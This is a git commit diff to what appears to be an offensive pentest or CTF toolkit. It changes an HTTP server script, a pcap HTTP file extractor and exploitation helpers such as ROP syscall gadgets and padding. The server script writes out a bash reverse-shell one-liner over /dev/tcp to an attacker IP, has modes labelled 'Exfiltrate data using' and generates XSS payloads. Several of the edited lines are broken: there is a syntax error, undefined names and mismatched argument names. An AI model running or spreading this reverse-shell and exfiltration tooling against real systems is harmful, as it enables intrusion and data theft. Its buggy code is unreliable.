pcap file extract, some bugfix
This commit is contained in:
parent
1a604ca2f3
commit
0ebf221c9c
@ -1,5 +1,6 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
import argparse
|
||||
from http.server import BaseHTTPRequestHandler, HTTPServer
|
||||
from urllib.parse import urlparse
|
||||
import threading
|
||||
@ -245,10 +246,10 @@ class HttpFileServer(HTTPServer):
|
||||
protocol = "https" if type(self.socket) == ssl.SSLSocket else "http"
|
||||
return f"{protocol}://{addr}{port}"
|
||||
|
||||
def get_full_url(self, uri):
|
||||
def get_full_url(self, uri, ip_addr=None):
|
||||
if not uri.startswith("/"):
|
||||
uri = "/" + uri
|
||||
return self.get_base_url() + uri
|
||||
return self.get_base_url(ip_addr) + uri
|
||||
|
||||
def stop(self):
|
||||
self.is_running = False
|
||||
@ -262,27 +263,57 @@ if __name__ == "__main__":
|
||||
print("Usage: %s [shell,dump,proxy,xss]" % sys.argv[0])
|
||||
exit(1)
|
||||
|
||||
httpPort = 80
|
||||
fileServer = HttpFileServer("0.0.0.0", httpPort)
|
||||
ipAddress = util.get_address()
|
||||
parser = argparse.ArgumentParser(description="Spawn a temporary http server")
|
||||
parser.add_argument(
|
||||
"action",
|
||||
choices=["shell", "dump", "proxy", "xss"],
|
||||
help="Choose one of these actions: shell, dump, proxy, xss"
|
||||
)
|
||||
|
||||
if sys.argv[1] == "shell":
|
||||
listenPort = 4444 if len(sys.argv) < 3 else int(sys.argv[2])
|
||||
rev_shell = "bash -i >& /dev/tcp/%s/%d 0>&1" % (ipAddress, listenPort)
|
||||
fileServer.addFile("shell.sh", rev_shell)
|
||||
fileServer.dumpRequest("/")
|
||||
print("Reverse Shell URL: http://%s/shell.sh" % ipAddress)
|
||||
elif sys.argv[1] == "dump":
|
||||
fileServer.dumpRequest("/")
|
||||
print("Exfiltrate data using: http://%s/" % ipAddress)
|
||||
elif sys.argv[1] == "proxy":
|
||||
url = "https://google.com" if len(sys.argv) < 3 else sys.argv[2]
|
||||
fileServer.forwardRequest("/proxy", url)
|
||||
print("Exfiltrate data using: http://%s/proxy" % ipAddress)
|
||||
elif sys.argv[1] == "xss":
|
||||
type = "img" if len(sys.argv) < 3 else sys.argv[2]
|
||||
xss = xss_handler.generatePayload(type, ipAddress, httpPort)
|
||||
parser.add_argument(
|
||||
"--bind-address",
|
||||
type=str,
|
||||
default="0.0.0.0",
|
||||
destination="bind_addr"
|
||||
help="Address to bind on (default: 0.0.0.0)"
|
||||
)
|
||||
|
||||
# Optionales Argument: port
|
||||
parser.add_argument(
|
||||
"--port",
|
||||
type=int,
|
||||
default=9000,
|
||||
help="Port to bind on (default: 9000)"
|
||||
)
|
||||
|
||||
parser.add_argument(
|
||||
"--payload",
|
||||
type=str,
|
||||
default=None,
|
||||
help="Payload for xss / shell"
|
||||
)
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
file_server = HttpFileServer(args.address, args.port)
|
||||
ip_address = util.get_address()
|
||||
|
||||
if args.action == "shell":
|
||||
payload_type = args.payload if args.payload else "bash"
|
||||
shell_payload = rev_shell.generate_payload(args.payload, ip_address, 4444)
|
||||
file_server.addFile("/shell", rev_shell)
|
||||
print("Reverse Shell URL:", file_server.get_full_url("/shell", ip_address))
|
||||
elif args.action == "dump":
|
||||
file_server.dumpRequest("/")
|
||||
print("Exfiltrate data using:", file_server.get_full_url("/", ip_address))
|
||||
elif args.action == "proxy":
|
||||
url = "https://google.com"
|
||||
file_server.forwardRequest("/proxy", url)
|
||||
print("Exfiltrate data using:", file_server.get_full_url("/proxy", ip_address))
|
||||
elif args.action == "xss":
|
||||
payload_type = args.payload if args.payload else "img"
|
||||
xss = xss_handler.generatePayload(payload_type, ip_addr, args.port)
|
||||
print("Exfiltrate data using:")
|
||||
print(xss)
|
||||
|
||||
fileServer.serve_forever()
|
||||
file_server.serve_forever()
|
||||
|
38
pcap-file-extract.py
Normal file → Executable file
38
pcap-file-extract.py
Normal file → Executable file
@ -1,3 +1,5 @@
|
||||
#!/bin/python
|
||||
|
||||
import argparse
|
||||
import os
|
||||
import re
|
||||
@ -191,7 +193,16 @@ class PcapExtractor:
|
||||
self._packets = rdpcap(self.pcap_path)
|
||||
|
||||
def extract_all(self):
|
||||
pass
|
||||
self._open_file()
|
||||
http_packets = self._parse_http_packets()
|
||||
filtered_packets = self._apply_filters(http_packets)
|
||||
for packet in filtered_packets:
|
||||
if len(packet.payload) > 0:
|
||||
file_path = packet.get_file_path()
|
||||
with open(os.path.join(self.output_dir, file_path.replace("/", "_")), "wb") as f:
|
||||
f.write(packet.payload)
|
||||
|
||||
print(f"[+] Extracted: {file_path} {util.human_readable_size(len(packet.payload))} Bytes")
|
||||
|
||||
def _apply_filters(self, packets):
|
||||
filtered_packets = packets
|
||||
@ -207,12 +218,31 @@ class PcapExtractor:
|
||||
print(packet)
|
||||
|
||||
def get_http_packet(self, packet_iterator, sock_src, initial_packet):
|
||||
http_buffer = bytes(initial_packet[TCP].payload)
|
||||
http_buffer = raw(initial_packet[TCP].payload)
|
||||
prev_seq = initial_packet[TCP].seq
|
||||
buff = None
|
||||
while packet_iterator.has_more():
|
||||
next_packet = packet_iterator.peek()
|
||||
if sock_src == f"{next_packet[IP].src}:{next_packet[TCP].sport}":
|
||||
next_packet = packet_iterator.pop()
|
||||
http_buffer += bytes(next_packet[TCP].payload)
|
||||
|
||||
if buff is not None:
|
||||
# if there is a buffered package, and the seq. number was not reused
|
||||
if buff[0] != next_packet[TCP].seq:
|
||||
# append this to output
|
||||
http_buffer += buff[1]
|
||||
buff = None
|
||||
|
||||
payload_len = len(next_packet[TCP].payload)
|
||||
if next_packet[TCP].seq - prev_seq != payload_len and payload_len == 1:
|
||||
buff = (next_packet[TCP].seq, raw(next_packet[TCP].payload))
|
||||
# potential TCP ZeroWindowProbe
|
||||
continue
|
||||
|
||||
assert next_packet[TCP].seq > prev_seq
|
||||
assert next_packet[IP].frag == 0
|
||||
http_buffer += raw(next_packet[TCP].payload)
|
||||
prev_seq = next_packet[TCP].seq
|
||||
else:
|
||||
break
|
||||
|
||||
@ -268,7 +298,7 @@ if __name__ == "__main__":
|
||||
parser.add_argument("-o", "--output-dir", help="Path to destination directory", default="extracted_files/",
|
||||
dest="output_dir")
|
||||
parser.add_argument("-l", "--list", help="List available files only", default=False, action="store_true")
|
||||
parser.add_argument("-e", "--extract", help="Extract files (default)", default=None, action="store_true")
|
||||
parser.add_argument("-e", "--extract", help="Extract files (default)", default=True, action="store_true")
|
||||
parser.add_argument("-ec", "--exclude-codes", help="Exclude http status codes, default: 101,304,403,404",
|
||||
default="101,304,403,404", dest="exclude_codes")
|
||||
parser.add_argument("-ic", "--include-codes", help="Limit http status codes", type=str,
|
||||
|
23
util.py
23
util.py
@ -106,6 +106,16 @@ def assert_not_empty(res, err=None):
|
||||
err = f"[-] '{res.url}' did not return any data" if err is None else err
|
||||
exit_with_error(res, err)
|
||||
|
||||
def assert_content_contains(res, data, err=None):
|
||||
util.assert_not_empty(res)
|
||||
if isinstance(data, str) and data in res.text:
|
||||
return True
|
||||
elif data in res.content:
|
||||
return True
|
||||
|
||||
err = f"[-] '{res.url}' did not include '{data} in response" if err is None else err
|
||||
exit_with_error(res, err)
|
||||
|
||||
def assert_json_path(res, path, value, err=None):
|
||||
assert_content_type(res, "application/json")
|
||||
assert_not_empty(res)
|
||||
@ -197,9 +207,18 @@ def genSyscall(elf, syscall, registers):
|
||||
rop.raw(rop.find_gadget([syscall_gadget]).address)
|
||||
return rop
|
||||
|
||||
def pad(x, n, b=b"\x00"):
|
||||
def lpad(x, n, b=b"\x00"):
|
||||
return pad(x, n, b, "l")
|
||||
|
||||
def rpad(x, n, b=b"\x00"):
|
||||
return pad(x, n, b, "r")
|
||||
|
||||
def pad(x, n, b=b"\x00", s="r"):
|
||||
if len(x) % n != 0:
|
||||
x += (n-(len(x)%n))*b
|
||||
if s == "r":
|
||||
x += (n-(len(x)%n))*b
|
||||
elif s == "l":
|
||||
x = (n-(len(x)%n))*b + x
|
||||
return x
|
||||
|
||||
def xor(a, b):
|
||||
|
Loading…
Reference in New Issue
Block a user